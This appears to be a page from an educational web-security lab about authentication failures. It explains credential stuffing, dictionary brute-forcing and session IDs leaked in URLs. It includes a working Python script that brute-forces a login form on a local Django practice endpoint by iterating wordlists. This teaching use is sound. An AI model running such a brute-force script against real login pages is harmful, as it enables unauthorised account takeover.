{% extends 'core/Identification and Authentication Failures/IA-Failures.html' %} {% load static %}
Let us follow up on the explanation in the previous Tab, starting with credential stuffing. There is little to show about this subcategory, as the attacker already has your login details. All he needs to do is use them. There are many ways to perform brute-force attacks. The simplest would be to take dictionaries with the most common names and passwords and try their combinations. Such as Git repo, by Daniel Miessler, Jason Haddix, and g0tmi1k. Once you have all the data, you pass them into the username and password fields. With some luck, one of the combinations works, and you have just logged into somebody's account. Let's move on to session identifiers. They are unique strings that get assigned to the users by our website's server. Exemplary session URL:
https://www.yourwebsite.com/index?sid=asgfdw4gfgw234effvfbtreg13rf
Now you may ask how this information is any good for the attackers. Let's say you logged into some website and then closed the website. If the website saves sessions, you will be logged in when you revisit the website. Now let's say somebody steals your session URL. He just accessed your logged-in account; all he needs to do is use your URL containing the session id. Optimally your website should omit displaying URLs like this.
https://www.yourwebsite.com/
Here is a code of how a brute force attack might look.
import requests
def brute_force(usernames, passwords, url):
for username in usernames:
for password in passwords:
credentials = {
"username":username,
"password":password
}
req = requests.post(url, credentials)
if req.text.find("Wrong Credentials") == -1:
print("Login Successful")
return username, password
else:
print("Login Failed")
def main():
with open('usernames.txt') as f:
usernames = f.read().splitlines()
with open('passwords.txt') as f:
passwords = f.read().splitlines()
url = "http://127.0.0.1:8000/problems/identification_authentication_failures/example"
username, password = brute_force(usernames, passwords, url)
print("\nCredentials:", "\nUsername: ", username, "\nPassword: ",password)
if __name__ == "__main__":
main()
Here we have a simple python code that opens two text files holding usernames and passwords. Then we have a
function that loops through them and adds them to the dictionary. Then the dictionary is sent as a post
request. You can download the files and play around with them with the buttons below. The original file
creators are
Daniel Miessler, and
attackdebris.
This code is explicitly aimed at the Django framework so that you can try the attack yourself. This approach might be slightly different depending on the framework used.
For correct script functionality you need all 3 files in the same folder. For script to work, you need to either insert your own created user into usernames and password text files, or register a user with credentials: